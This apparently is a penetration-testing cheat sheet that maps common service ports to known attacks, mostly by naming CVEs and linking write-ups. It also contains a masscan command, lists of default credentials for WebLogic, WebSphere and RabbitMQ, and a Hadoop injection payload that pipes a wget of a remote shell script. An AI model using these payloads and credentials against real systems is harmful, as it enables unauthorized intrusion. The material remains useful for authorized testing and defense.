Exploiting Common Port Vulnerabilities
Posted Pggcute
Quick scan: Masscan -p80,800 ip --rate=10000
21/ FTP
Anonymous access / brute force
Denial of service
22/ SSH
Brute force
23/ telnet
Winbox(cve-2018-14847)
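Why is telnet needed?
telnet is used to check whether a given port is reachable. During development, the port we use most often is 8080, so you can start the server and use telnet to check whether that port is available.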
25/ SMTP
Email spoofing
161/ snmp
Weak passwords
https://blog.csdn.net/archersaber39/article/details/78932252
389/ LDAP
Anonymous access
https://www.cnblogs.com/persuit/p/5706432.html
LDAP injection
http://www.4hou.com/technology/9090.html
https://www.freebuf.com/articles/web/149059.html
443/ ssl
OpenSSL Heartbleed
https://paper.seebug.org/437/
http://www.anquan.us/static/drops/papers-1381.html
https://www.freebuf.com/sectool/33191.html
445/ smb
Windows 10 denial of service
EternalBlue RCE
875/ rsync
Anonymous access
http://www.anquan.us/static/bugs/wooyun-2016-0190815.html
https://paper.seebug.org/409/
http://www.91ri.org/11093.html
1433/ mssql
Brute force
http://www.anquan.us/static/drops/tips-12749.html
https://www.seebug.org/appdir/Microsoft%20SQL%20Server
1521/ oracle
Brute force
https://www.exploit-db.com/exploits/33084
2601/ zebra
http://www.anquan.us/static/bugs/wooyun-2013-047409.html
3128/ squid
3306/ mysql
RCE
http://www.91ri.org/17511.html
CVE-2015-0411
Hash cracking
https://www.freebuf.com/column/153561.html
WAF bypass
https://www.freebuf.com/articles/web/155570.html
general_log_file getshell
https://www.freebuf.com/column/143125.html
Privilege escalation
http://www.91ri.org/16540.html
3312/ kangle
getshell
https://www.secpulse.com/archives/23927.html
3389/ rdp
Shift, Magnifier, input method bypass; guest user
EternalBlue (ESTEEMAUDIT)
https://www.freebuf.com/articles/system/132171.html
https://www.anquanke.com/post/id/86328
ms12-020
https://blog.csdn.net/meyo_leo/article/details/77950552
4440/ rundeck
https://www.secpulse.com/archives/29500.html
4848/ glassfish
File read
https://www.secpulse.com/archives/42277.html
https://www.anquanke.com/post/id/85948
GlassFish2/ admin:admin
GlassFish3,4/ If the administrator has not set an account, local access logs in automatically, while remote access shows a configuration error
5432/ PostgreSQL
RCE
https://www.cnblogs.com/KevinGeorge/p/8521496.html
https://www.secpulse.com/archives/69153.html
Default account: postgres
References
http://www.91ri.org/13070.html
http://www.91ri.org/6507.html
5672,15672,4369,25672/ RabbitMQ
(guest/guest)
5900/ VNC
https://www.seebug.org/appdir/RealVNC
5984/ CouchDB
http://xxx:5984/_utils/
6082/ varnish
Unauthorized CLI access
https://www.secpulse.com/archives/10681.html
6379/ redis
Redis
Unauthorized access
ssh publickey
crontab
webshell
Deserialization
Writing a .bat file to the startup folder
Reference: https://www.freebuf.com/column/170710.html
7001,7002/ WebLogic
Default weak credentials
weblogic/weblogic ,weblogic/welcom ,weblogic/welcom1,weblogic1/weblogic
Deserialization
CVE-2018-2628
https://www.freebuf.com/articles/web/169770.html
https://www.seebug.org/appdir/WebLogic
9200,9300/ elasticsearch
CVE-2015-1427
http://www.anquan.us/static/drops/papers-5142.html
CVE-2018-17246
https://www.seebug.org/vuldb/ssvid-97730
References
https://www.seebug.org/search/?keywords=elasticsearch
9000/ fcgi
https://paper.seebug.org/289/
9043/ WebSphere
Websphere8.5
https://localhost:9043/ibm/console/logon.jsp
Websphere6-7
http://localhost:9043/ibm/console
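Unauthorized access to the admin console; WAR packages can be deployed after login
The SOAP service has a deserialization vulnerability
Weak credentials: admin /password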
11211/ memcache
Unauthorized access
UDP reflection
https://shockerli.net/post/memcached-udp-reflection-attack-bug/
27017,27018/ Mongodb
Unauthorized access
Injection
https://www.anquanke.com/post/id/83763
phpMoAdmin RCE
https://www.aqniu.com/threat-alert/6978.html
50000/ SAP
SAP command execution
https://www.secpulse.com/archives/20204.html
50070,50030/ hadoop
Unauthorized access
https://www.freebuf.com/vuls/173638.html
Command execution
host:50060/pstack?pid=123|wget http://somehost/shell.sh
https://www.seebug.org/search/?keywords=hadoop
Other
http://www.91ri.org/15441.html